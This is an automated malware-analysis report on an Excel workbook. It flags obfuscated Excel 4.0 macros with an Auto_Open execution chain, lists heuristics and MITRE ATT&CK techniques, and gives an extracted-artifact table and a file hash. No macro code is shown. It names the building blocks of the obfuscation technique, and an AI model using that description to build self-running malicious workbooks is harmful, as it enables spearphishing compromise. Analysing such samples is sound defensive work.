MALICIOUS (Risk Score: 140)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

The file triggers critical heuristics indicating obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macros are designed to run automatically when the document is opened, suggesting malicious intent to execute arbitrary code. The presence of an Auto_Open entry points to a spearphishing attachment delivery method.

Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- Obfuscated XLM Auto_Open execution chain (critical, OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 127981 bytes |

SHA-256: 880797d6df024252f777313e8526617b4325832a90d32f335eb1b83d4370e7e4

Preview script: first 1,000 lines of the extracted script